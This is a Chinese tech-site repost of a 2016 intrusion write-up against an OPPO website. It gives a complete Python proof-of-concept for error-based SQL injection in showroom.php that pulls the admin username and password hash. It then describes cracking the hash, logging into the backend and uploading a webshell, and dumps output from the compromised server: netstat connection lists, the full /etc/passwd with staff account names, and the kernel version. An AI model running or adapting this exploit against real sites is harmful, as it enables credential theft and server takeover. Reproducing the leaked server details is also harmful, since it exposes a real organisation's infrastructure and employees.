IT技术互动交流平台

oppo官网某站报错注入(附python POC脚本)至GETSHELL

作者:佚名  发布日期:2016-03-03 21:27:18

oppo某站存在报错注入


附python脚本
#!/usr/bin/env python
#coding:utf-8
__author__ = 'Lu'
import urllib2
import urllib
import sys
import hashlib
import re
def verify(url):
    target = "%s/showroom.php?act=get_store&sell_district_id=1" % url
    payload = " AND (SELECT 1879 FROM(SELECT COUNT(*),CONCAT(0x71626b7071,(select concat(0x23,0x23,username,0x23,0x23,password,0x23,0x23) from bd_admin where id=1 limit 1),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    poc = target + payload
    try:
        # 发送 HTTP 请求
        req = urllib2.Request(poc)
        response = urllib2.urlopen(req)
        s = "Duplicate entry 'qbkpq(.*?)qqvxq1'"
       
        if response:
            # 处理 响应
            data = response.read()
            result = re.findall(s,data)
            print "用户名#密码是 : %s" % result
    except Exception, e:
        print "Something happend..."
        print e
def main():
    args = sys.argv
    url = ""
    if len(args) == 2:
        url = args[1]
        verify(url)
    else:
        print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
    main()
md5解密 后台登录


GETSHELL
mask 区域
1.http://**.**.**/upload/a.php

netstat -an | grep ESTABLISHED
tcp        0      0 192.168.0.21:36555      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:34326      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:80         192.168.2.5:35409       ESTABLISHED
tcp        0      0 192.168.0.21:32790      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:46251      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:38925      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:45137      218.75.154.137:443      ESTABLISHED
tcp        0      0 192.168.0.21:58753      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:39190      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:48091      198.11.178.243:23333    ESTABLISHED

tcp        0      0 192.168.0.21:55740      115.231.159.133:443     ESTABLISHED
tcp        0      0 192.168.0.21:45189      218.75.154.137:443      ESTABLISHED
tcp        0      0 192.168.0.21:53638      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:52250      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:37587      198.11.178.243:23333    ESTABLISHED
tcp        0      0 192.168.0.21:44610      198.11.178.243:23333    ESTABLISHED
tcp6       0      0 192.168.0.21:35940      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:54957      117.79.131.86:80        ESTABLISHED
tcp6       0      0 192.168.0.21:58796      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:46477      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:39783      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:57555      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58802      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:41560      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:39498      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:46070      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:58944      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:51262      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:45042      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58806      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:51920      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:50305      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:46040      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58789      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:33979      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:55702      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:53109      58.250.207.48:443       ESTABLISHED

 

tcp6       0      0 192.168.0.21:55918      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:32812      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:33143      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:56389      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58599      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:38080      192.168.0.23:46720      ESTABLISHED
tcp6       0      0 192.168.0.21:34809      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:58788      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:49518      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:57459      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:41422      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:57341      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:41157      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57492      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:46360      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:53509      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:46852      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:51921      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:34070      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:57646      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:38595      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:44697      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58797      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:42793      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:47552      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:47160      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:36648      123.125.115.18:443      ESTABLISHED

 

tcp6       0      0 192.168.0.21:34582      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:47731      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:40307      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:33262      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:56565      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58803      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:46052      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:40891      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:45844      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:36269      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:54774      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:33626      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58519      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58545      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:49201      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57074      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:39782      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:36481      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:44995      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57460      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:57351      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:49513      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:54684      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:34811      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:49514      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:33639      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:35645      123.125.115.18:443      ESTABLISHED

 

tcp6       0      0 192.168.0.21:36793      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:48795      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:54505      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:34482      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57459      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57743      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:36484      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:40622      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:42534      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57544      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:42616      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:39726      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:54105      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:58800      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:59511      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57497      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:60372      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:57463      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:58804      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:48340      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:41836      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:46622      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:43033      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:46064      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:48010      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:37545      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58668      58.250.207.48:443       ESTABLISHED

 

tcp6       0      0 192.168.0.21:43163      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:51356      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:50538      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:56898      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:38542      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:44322      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:49519      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:42243      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:34627      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:41580      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:40344      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:58807      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:46556      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:58791      192.168.0.22:33306      ESTABLISHED
tcp6       0      0 192.168.0.21:40103      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:51898      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:54728      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:54487      123.125.115.18:443      ESTABLISHED
tcp6       0      0 192.168.0.21:45534      58.250.207.48:443       ESTABLISHED
tcp6       0      0 192.168.0.21:38268      123.125.115.18:443      ESTABLISHED
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
#jhshi:x:1000:1000:,,,:/home/jhshi:/bin/bash
ychen:x:1001:1001:,,,:/home/ychen:/bin/bash
#mzhou:x:1002:1002:,,,:/home/mzhou:/bin/bash
nagios:x:104:106::/var/lib/nagios:/bin/false
nginx:x:105:107:nginx user,,,:/nonexistent:/bin/false

 

mysql:x:106:108:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:107:109::/var/run/dbus:/bin/false
#xtjiao:x:1003:1003:,,,:/home/xtjiao:/bin/bash
#zwzheng:x:1004:1004:,,,:/home/zwzheng:/bin/bash
syncer:x:1005:1005:,,,:/home/syncer:/bin/bash
sphinxsearch:x:108:110:Sphinx fulltext search service,,,:/var/run/sphinxsearch:/bin/false
redis:x:109:111:redis server,,,:/var/lib/redis:/bin/false
hwang:x:1006:1006:,,,:/home/hwang:/bin/bash
lchen:x:1007:1007:,,,:/home/lchen:/bin/bash
hbai:x:1002:1009:,,,:/home/hbai:/bin/bash
avahi:x:110:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
tomcat55:x:111:65534::/usr/share/tomcat5.5:/bin/false
mjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bash
qxu:x:1003:1010:,,,:/home/qxu:/bin/bash
wjzhu:x:1004:1011:,,,:/home/wjzhu:/bin/bash
cywang:x:1008:1012:,,,:/home/cywang:/bin/bash
zjli:x:1009:1013::/home/zjli:/bin/sh
yfhu:x:1010:1014::/home/yfhu:/bin/sh
ljni:x:1011:1015::/home/ljni:/bin/sh
内核:Linux hz97-164-21 2.6.32-5-amd64

 

Tag标签: 脚本   官网某  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规